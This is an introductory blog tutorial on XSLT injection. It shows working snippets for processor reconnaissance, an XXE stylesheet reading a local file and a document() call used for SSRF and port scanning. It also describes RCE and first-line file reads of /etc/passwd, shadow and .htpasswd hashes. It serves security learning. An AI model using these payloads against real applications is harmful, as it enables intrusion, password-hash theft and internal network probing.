XSLT Injections for Dummies
Introduction
XML is quite widely known format and I am sure you must even have heard a lot about XXE (XML External Entity) and it’s even a part of OWASP Top 10 list for Web Application Security.
But have you heard of XSLT?
It stands for Extensible Stylesheet Language Transformations and is a language used for transforming XML documents to either XML or other formats like HTML, SVG, SVG, plain text, etc…
As listed in Wikipedia page for XSLT:
Although XSLT is designed as a special-purpose language for XML transformation, the language is Turing-complete, making it theoretically capable of arbitrary computations.
That must already sound too much fun.
XSLT provides constructs like loops, if, switch-case, and other functions like substring, etc. to perform manipulations to the XML documents. Not only that, it even allows you to define functions and call them as well. Amazing!
It uses XPath to locate the different subsets of the XML document tree and then it can be used to perform operations on them: check for their values, perform functions on the contents, and much much more.
There’s a really awesome tutorial on XSLT and XPath. I highly recommend this one if you wish to learn more on XSLT & XPath. But for the scope of this post, the stuff we discussed will suffice.
XSLT Injections
Now let’s talk about the interesting bits.
Injection issues happen when the user input is blindly trusted without thinking of the consequences. If the right conditions are set, then this can result in data exfiltration, RCE, XSS and much much more.
If a user is able to supply their own XSLT files or inject XSLT tags, then this can result in XSLT injections. The constructs that you have at your disposal greatly depend on the processor that’s being used and the version of the XSLT specification. Version 1 is most widely used and supported because the newer versions: 2 & 3 are backwards compatible and also because the browsers support version 1 and hence, the popularity.
Version 2 & 3 have a lot more features compared to version 1 so the exploitation becomes much more easy with the higher versions. But still, with 1, you can get a lot of stuff done. Here are some interesting issues:
- RCE
- Local File Read (via error messages)
- XXE
- SSRF and Port Scans
In the XSLT ecosystem, we have a different number of processors including:
As you can already notice, libxslt is quite common and mostly, the version is 1 except Saxon by Saxonica which is quite feature rich and supports both version 1 and 2.
So for our discussion, we will discuss on libxslt. It’s a C library developed for the GNOME project. You can try it out on CLI on Linux using the xsltproc command.
Now let’s focus on the attacks. This is not supposed to be an exhaustive guide on the subject (I’ve linked more resources at the end of this article for a deeper dive). We will just touch upon the basics and I will show you RCE & Local File Read using XSLT injection.
Consider an application that takes an arbitrary XSLT file and then parses it’s contents. What do you think could happen?
Recon
You might be thinking all this is good to know but how do you even know that what’s the processor being used. Because otherwise it would be sort of a “blind” attack and that’s more painful and noisy, right? Worry not, there are some tags you could use for performing recon.
These are the 3 tags that would give you back the version, vendor and vendor url:
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
So you would now know of all the features are supported by the processor and move forward to the exploitation part.
RCE
An XSLT file like this could result in RCE, if the application is vulnerable (if registerPHPFunctions is enabled):
Local File Read
And not only that, you could even read the contents of a local file (at least 1 line) via the reported error messages:
XSLT file containing the payload to read
/etc/passwd
file
Processing the XLST file results in leaking the first line of
/etc/passwd
file
Notice that the application gave out an error but the first line still was revealed! It happened because document (or even include & import functions for that matter) would try to parse the specified file and since the passwd file was not a valid XML file, these functions would error out and show the first line of the file.
Now you might think that this is quite limiting, but wait a minute… If the application was running as root, you could get the root user’s password hash by reading the first line of the shadow file. And you can even read the contents of the .htpasswd file to get the password hash for admin or other users.
So it isn’t all in vain.
XXE
You could even perform XXE but that should be obvious. Consider this example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "path/to/file">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/events">
Events &ext_file;:
<xsl:for-each select="event">
<xsl:value-of select="name"/>: <xsl:value-of select="value"/>
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
SSRF & Port Scanning
Using a payload like this one (omitted the extra stuff just for brevity):
<xsl:copy-of select="document('http://10.10.10.10:22')"/>
You can see that this would make a request to the specified IP. Now you can imagine that with this primitive, you get the power to perform SSRF and even port scans by leveraging the different error messages you get back for different scenarios (port ope, closed, invalid host, etc.).
Extra Resources
I’ve went through only a few of the attacks that can be performed, but there’s more! For that, I recommend you to go through the following resources that go much more in-depth:
Closing Thoughts
I hope you enjoyed this post and learnt something interesting. I wanted to cover XSLT injections on a higher level and show the different attacks possible. There’s a lot more to learn and all the resources that I have linked should give you a much deeper understanding. Overall, there’s nothing much to this vulnerability other than untrusted user-input being taken by the processor, and the nuances are specific to different processors and different languages.